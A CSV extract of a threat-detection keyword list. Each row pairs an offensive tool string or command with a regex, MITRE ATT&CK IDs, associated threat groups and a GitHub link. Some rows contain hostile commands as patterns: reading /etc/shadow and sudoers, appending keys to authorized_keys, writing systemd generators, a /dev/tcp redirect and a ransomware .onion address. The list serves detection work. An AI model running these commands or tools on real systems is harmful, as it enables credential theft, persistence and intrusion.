"*can_flood_frames*",".{0,1000}can_flood_frames.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37547"
"*Cancelling the password spray.*",".{0,1000}Cancelling\sthe\spassword\sspray\..{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","37548"
"*CandyPotato.exe *",".{0,1000}CandyPotato\.exe\s.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","37549"
"*canix1/ADACLScanner*",".{0,1000}canix1\/ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","37550"
"*can-kat/cstealer*",".{0,1000}can\-kat\/cstealer.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","37551"
"*Cannot enable SE_DEBUG_NAME privilege on remote host*",".{0,1000}Cannot\senable\sSE_DEBUG_NAME\sprivilege\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37552"
"*cannot encode the shellcode when self-executing the payload*",".{0,1000}cannot\sencode\sthe\sshellcode\swhen\sself\-executing\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","37553"
"*Cannot enumerate antivirus*",".{0,1000}Cannot\senumerate\santivirus.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","37554"
"*Cannot get LSASS PID on remote host*",".{0,1000}Cannot\sget\sLSASS\sPID\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37556"
"*Cannot load SAM functions on remote host*",".{0,1000}Cannot\sload\sSAM\sfunctions\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37557"
"*Cannot open LSA policy on remote host*",".{0,1000}Cannot\sopen\sLSA\spolicy\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37558"
"*Cannot open registry key HKLM\SECURITY\Policy\Secrets on remote host*",".{0,1000}Cannot\sopen\sregistry\skey\sHKLM\\SECURITY\\Policy\\Secrets\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37559"
"*Cannot open SAM on remote host*",".{0,1000}Cannot\sopen\sSAM\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37560"
"*Cannot send REVSOCKS_NORMAL handshake!*",".{0,1000}Cannot\ssend\sREVSOCKS_NORMAL\shandshake!.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","37561"
"*Cannot start wstunnel server:*",".{0,1000}Cannot\sstart\swstunnel\sserver\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","37562"
"*Can't find DHCP Server PID. Exiting.*",".{0,1000}Can\'t\sfind\sDHCP\sServer\sPID\.\sExiting\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","#content","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","37563"
"*capcom_sys_exec*",".{0,1000}capcom_sys_exec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37564"
"*capcom_sys_exec.x64.dll*",".{0,1000}capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37565"
"*CaptainNox/Hypnos*",".{0,1000}CaptainNox\/Hypnos.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","37566"
"*captcha-killer.*.jar*",".{0,1000}captcha\-killer\..{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","37567"
"*capture/lockout_keylogger*",".{0,1000}capture\/lockout_keylogger.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","37568"
"*CapturedCredential.cs*",".{0,1000}CapturedCredential\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37569"
"*CapturedCredential.exe*",".{0,1000}CapturedCredential\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37570"
"*CapturedHashCredential.*",".{0,1000}CapturedHashCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37571"
"*CapturedPasswordCredential.*",".{0,1000}CapturedPasswordCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37572"
"*CapturedTicketCredential.*",".{0,1000}CapturedTicketCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37573"
"*capturetokenphish.ps1*",".{0,1000}capturetokenphish\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","37574"
"*capturetokenphish.py*",".{0,1000}capturetokenphish\.py.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","37575"
"*CarbonCopy*",".{0,1000}CarbonCopy.{0,1000}","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux","T1553.002 - T1588.004 - T1205 - T1027","TA0005 - TA0008 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","N/A","10","1359","283","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z","37576"
"*CarbonCopy.py*",".{0,1000}CarbonCopy\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","37577"
"*cardano2john.py*",".{0,1000}cardano2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37578"
"*careCrow*_linux_amd64*",".{0,1000}careCrow.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","37579"
"*cargo install glit*",".{0,1000}cargo\sinstall\sglit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","37580"
"*cargo install rsocx*",".{0,1000}cargo\sinstall\srsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","37581"
"*cargo install rsocx*",".{0,1000}cargo\sinstall\srsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","37582"
"*carlospolop/PEASS-ng*",".{0,1000}carlospolop\/PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37584"
"*carlospolop/PurplePanda*",".{0,1000}carlospolop\/PurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","37585"
"*CarSeat: A junior Seatbelt\n*",".{0,1000}CarSeat\:\sA\sjunior\sSeatbelt\\n.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#content","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37586"
"*cartelirsn5l54ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vlwiayd.onion*",".{0,1000}cartelirsn5l54ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vlwiayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37587"
"*cat *.bin | base64 -w 0 > *.txt*",".{0,1000}cat\s.{0,1000}\.bin\s\|\sbase64\s\-w\s0\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37592"
"*cat *.ntds",".{0,1000}cat\s.{0,1000}\.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","37597"
"*cat *.pub >> */authorized_keys*",".{0,1000}cat\s.{0,1000}\.pub\s\>\>\s.{0,1000}\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","37600"
"*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp",".{0,1000}cat\s\.\/apache\-tomcat\-8\.5\.77\/webapps\/ROOT\/tomcatwar\.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","0","#linux","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","37604"
"*cat /etc/shadow*",".{0,1000}cat\s\/etc\/shadow.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","37614"
"*cat /etc/sudoers 2>/dev/null*",".{0,1000}cat\s\/etc\/sudoers\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","37615"
"*cat <<-EOF > /usr/lib/systemd/system-generators/generator*",".{0,1000}cat\s\<\<\-EOF\s\>\s\/usr\/lib\/systemd\/system\-generators\/generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","37619"
"*cat > /dev/tcp/127.0.0.1*<<END*",".{0,1000}cat\s\>\s\/dev\/tcp\/127\.0\.0\.1.{0,1000}\<\<END.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface ","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.tool.elatedmonkey","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","37620"
"*cat domains.txt | dnsx -silent -w jira*grafana*jenkins -d -*",".{0,1000}cat\sdomains\.txt\s\|\sdnsx\s\-silent\s\-w\sjira.{0,1000}grafana.{0,1000}jenkins\s\-d\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","37621"
